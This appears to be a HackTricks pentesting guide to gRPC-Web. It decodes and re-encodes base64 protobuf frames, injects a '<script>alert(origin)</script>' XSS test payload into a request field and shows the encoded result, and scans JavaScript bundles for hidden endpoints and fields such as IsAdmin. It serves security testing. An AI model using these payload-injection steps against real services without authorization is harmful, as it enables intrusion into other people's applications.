# Pentesting gRPC-Web

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**Telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub repos.

</details>
{% endhint %}

## **Manipulating gRPC-Web payloads**

gRPC-Web requests use the Content-Type `application/grpc-web-text`, which carries a base64-encoded protobuf frame. You can decode and re-encode it with the [grpc-coder](https://github.com/nxenon/grpc-pentest-suite) tool, or install its [Burp Suite extension](https://github.com/nxenon/grpc-pentest-suite).

### **Manual manipulation with the gRPC Coder tool**

1. First decode the payload:
```bash
echo "AAAAABYSC0FtaW4gTmFzaXJpGDY6BVhlbm9u" | python3 grpc-coder.py --decode --type grpc-web-text | protoscope > out.txt
```
2. Edit the contents of the decoded payload:
```
nano out.txt
2: {"Amin Nasiri Xenon GRPC"}
3: 54
7: {"<script>alert(origin)</script>"}
```
3. Encode the new payload:
```bash
protoscope -s out.txt | python3 grpc-coder.py --encode --type grpc-web-text
```
4. Use the output in the Burp interceptor:
```
AAAAADoSFkFtaW4gTmFzaXJpIFhlbm9uIEdSUEMYNjoePHNjcmlwdD5hbGVydChvcmlnaW4pPC9zY3JpcHQ+
```
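The decode/encode steps above, re-implemented as an added example that is not part of this page or of the grpc-pentest-suite project: it parses the 5-byte gRPC-Web frame header and the protobuf wire format into (field number, wire type, value) triples and re-serializes them. The sample body is the one from step 1; its fields 2, 3 and 7 are the Name, Age and Test2 fields of the EchoRequest message that grpc-scan reports for this service.

```python
import base64

# Constructed sample input: the grpc-web-text request body decoded in step 1 above.
SAMPLE = "AAAAABYSC0FtaW4gTmFzaXJpGDY6BVhlbm9u"

def read_varint(buf, pos):
    # Base-128 varint starting at buf[pos]; returns (value, next_pos).
    value, shift = 0, 0
    while buf[pos] & 0x80:
        value |= (buf[pos] & 0x7F) << shift
        shift, pos = shift + 7, pos + 1
    return value | (buf[pos] << shift), pos + 1

def write_varint(value):
    # Inverse of read_varint for a non-negative int.
    out = bytearray()
    while value > 0x7F:
        out.append((value & 0x7F) | 0x80)
        value >>= 7
    return bytes(out) + bytes([value])

def parse_frame(text):
    # gRPC-Web framing: 1 flags byte (0x80 = trailers), 4-byte big-endian length, then the message.
    raw = base64.b64decode(text)
    flags, length = raw[0], int.from_bytes(raw[1:5], "big")
    body = raw[5:5 + length]
    if len(body) != length:            # header claims more bytes than the frame carries
        raise ValueError("truncated gRPC-Web frame")
    return flags, body

def parse_fields(body):
    # Walk the protobuf wire format into a list of (field_number, wire_type, value).
    fields, pos = [], 0
    while pos < len(body):
        tag, pos = read_varint(body, pos)
        num, wt = tag >> 3, tag & 7
        if wt == 0:                    # varint: int32/int64/bool/enum
            val, pos = read_varint(body, pos)
        else:                          # 2: length-delimited, 1: fixed64, 5: fixed32 (raw bytes)
            size, pos = read_varint(body, pos) if wt == 2 else ({1: 8, 5: 4}[wt], pos)
            val, pos = body[pos:pos + size], pos + size
        fields.append((num, wt, val))
    return fields

def encode_frame(fields, flags=0):
    # Serialise fields back into a grpc-web-text body (inverse of parse_frame + parse_fields).
    body = b"".join(write_varint((n << 3) | w) + (write_varint(v) if w == 0 else
                    write_varint(len(v)) + v if w == 2 else v) for n, w, v in fields)
    return base64.b64encode(bytes([flags]) + len(body).to_bytes(4, "big") + body).decode()
```

A request-inspection or logging layer that looks only at the text body sees nothing but base64; decoding the frame and its fields this way is what makes the submitted values reviewable.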

### **Manual manipulation with the gRPC-Web Coder Burp Suite extension**

You can use the gRPC-Web Coder Burp Suite extension from the [gRPC-Web Pentest Suite](https://github.com/nxenon/grpc-pentest-suite), which is easier. Its installation and usage instructions are in the repository.

## **Analyzing gRPC-Web JavaScript files**

Every gRPC-Web application has at least one JavaScript file. You can analyze that file to find new messages, endpoints and services. Try the [gRPC-Scan](https://github.com/nxenon/grpc-pentest-suite) tool.

1. Download the gRPC-Web JavaScript file
2. Scan it with grpc-scan.py:
```bash
python3 grpc-scan.py --file main.js
```
3. Analyze the output and test the new endpoints and services:
```
Output:
Found Endpoints:
/grpc.gateway.testing.EchoService/Echo
/grpc.gateway.testing.EchoService/EchoAbort
/grpc.gateway.testing.EchoService/NoOp
/grpc.gateway.testing.EchoService/ServerStreamingEcho
/grpc.gateway.testing.EchoService/ServerStreamingEchoAbort

Found Messages:

grpc.gateway.testing.EchoRequest:
+------------+--------------------+--------------+
| Field Name | Field Type | Field Number |
+============+====================+==============+
| Message | Proto3StringField | 1 |
+------------+--------------------+--------------+
| Name | Proto3StringField | 2 |
+------------+--------------------+--------------+
| Age | Proto3IntField | 3 |
+------------+--------------------+--------------+
| IsAdmin | Proto3BooleanField | 4 |
+------------+--------------------+--------------+
| Weight | Proto3FloatField | 5 |
+------------+--------------------+--------------+
| Test | Proto3StringField | 6 |
+------------+--------------------+--------------+
| Test2 | Proto3StringField | 7 |
+------------+--------------------+--------------+
| Test3 | Proto3StringField | 16 |
+------------+--------------------+--------------+
| Test4 | Proto3StringField | 20 |
+------------+--------------------+--------------+

grpc.gateway.testing.EchoResponse:
+--------------+--------------------+--------------+
| Field Name | Field Type | Field Number |
+==============+====================+==============+
| Message | Proto3StringField | 1 |
+--------------+--------------------+--------------+
| Name | Proto3StringField | 2 |
+--------------+--------------------+--------------+
| Age | Proto3IntField | 3 |
+--------------+--------------------+--------------+
| IsAdmin | Proto3BooleanField | 4 |
+--------------+--------------------+--------------+
| Weight | Proto3FloatField | 5 |
+--------------+--------------------+--------------+
| Test | Proto3StringField | 6 |
+--------------+--------------------+--------------+
| Test2 | Proto3StringField | 7 |
+--------------+--------------------+--------------+
| Test3 | Proto3StringField | 16 |
+--------------+--------------------+--------------+
| Test4 | Proto3StringField | 20 |
+--------------+--------------------+--------------+
| MessageCount | Proto3IntField | 8 |
+--------------+--------------------+--------------+

grpc.gateway.testing.ServerStreamingEchoRequest:
+-----------------+-------------------+--------------+
| Field Name | Field Type | Field Number |
+=================+===================+==============+
| Message | Proto3StringField | 1 |
+-----------------+-------------------+--------------+
| MessageCount | Proto3IntField | 2 |
+-----------------+-------------------+--------------+
| MessageInterval | Proto3IntField | 3 |
+-----------------+-------------------+--------------+

grpc.gateway.testing.ServerStreamingEchoResponse:
+------------+-------------------+--------------+
| Field Name | Field Type | Field Number |
+============+===================+==============+
| Message | Proto3StringField | 1 |
+------------+-------------------+--------------+

grpc.gateway.testing.ClientStreamingEchoRequest:
+------------+-------------------+--------------+
| Field Name | Field Type | Field Number |
+============+===================+==============+
| Message | Proto3StringField | 1 |
+------------+-------------------+--------------+

grpc.gateway.testing.ClientStreamingEchoResponse:
+--------------+----------------+--------------+
| Field Name | Field Type | Field Number |
+==============+================+==============+
| MessageCount | Proto3IntField | 1 |
+--------------+----------------+--------------+
```
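A minimal version of what grpc-scan does, added here as an example (not the tool's own code): it pulls service method paths from the `grpc.web.MethodDescriptor` calls and message fields from the `jspb` getters of an unminified bundle. The JavaScript sample is constructed to mirror protoc-gen-grpc-web and protoc-gen-js output; real bundles are often minified, in which case the getter names are mangled and only the string literals survive.

```python
import re

# Constructed sample modelled on unminified protoc-gen-grpc-web / protoc-gen-js output (not a real bundle).
SAMPLE_JS = """
const methodDescriptor_EchoService_Echo = new grpc.web.MethodDescriptor(
  '/grpc.gateway.testing.EchoService/Echo', grpc.web.MethodType.UNARY,
  proto.grpc.gateway.testing.EchoRequest, proto.grpc.gateway.testing.EchoResponse);
const methodDescriptor_EchoService_ServerStreamingEcho = new grpc.web.MethodDescriptor(
  '/grpc.gateway.testing.EchoService/ServerStreamingEcho', grpc.web.MethodType.SERVER_STREAMING,
  proto.grpc.gateway.testing.ServerStreamingEchoRequest,
  proto.grpc.gateway.testing.ServerStreamingEchoResponse);
proto.grpc.gateway.testing.EchoRequest.prototype.getMessage = function() {
  return jspb.Message.getFieldWithDefault(this, 1, "");
};
proto.grpc.gateway.testing.EchoRequest.prototype.getAge = function() {
  return jspb.Message.getFieldWithDefault(this, 3, 0);
};
proto.grpc.gateway.testing.EchoRequest.prototype.getIsAdmin = function() {
  return jspb.Message.getBooleanFieldWithDefault(this, 4, false);
};
proto.grpc.gateway.testing.EchoRequest.prototype.getWeight = function() {
  return jspb.Message.getFloatingPointFieldWithDefault(this, 5, 0.0);
};
"""

# Service method paths are string literals passed to grpc.web.MethodDescriptor.
ENDPOINT_RE = re.compile(
    r"new grpc\.web\.MethodDescriptor\(\s*'(/[\w.]+/\w+)'\s*,\s*grpc\.web\.MethodType\.(\w+)")
# Message fields surface as jspb getters: the getter variant and default literal reveal the type.
FIELD_RE = re.compile(
    r"proto\.([\w.]+)\.prototype\.get(\w+)\s*=\s*function\(\)\s*\{\s*"
    r"return jspb\.Message\.get(\w*)FieldWithDefault\(this,\s*(\d+),\s*([^)]*)\)")

def find_endpoints(js):
    # Returns [(path, method_type)] for every MethodDescriptor in the bundle.
    return ENDPOINT_RE.findall(js)

def infer_type(kind, default):
    # jspb getter variant + default literal -> proto3 scalar family.
    if kind in ("Boolean", "FloatingPoint"):
        return {"Boolean": "bool", "FloatingPoint": "float"}[kind]
    return "string" if default.strip().startswith(('"', "'")) else "int"

def find_messages(js):
    # Returns {message_name: [(field_name, type, field_number)]}, in source order.
    messages = {}
    for msg, field, kind, number, default in FIELD_RE.findall(js):
        messages.setdefault(msg, []).append((field, infer_type(kind, default), int(number)))
    return messages
```

Client-settable fields such as `IsAdmin` are the ones whose server-side handling deserves review: the value a client puts in the request must never be the basis for an authorization decision.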

## References

* [Amin Nasiri's gRPC-Web hacking article](https://infosecwriteups.com/hacking-into-grpc-web-a54053757a45)
* [gRPC-Web Pentest Suite](https://github.com/nxenon/grpc-pentest-suite)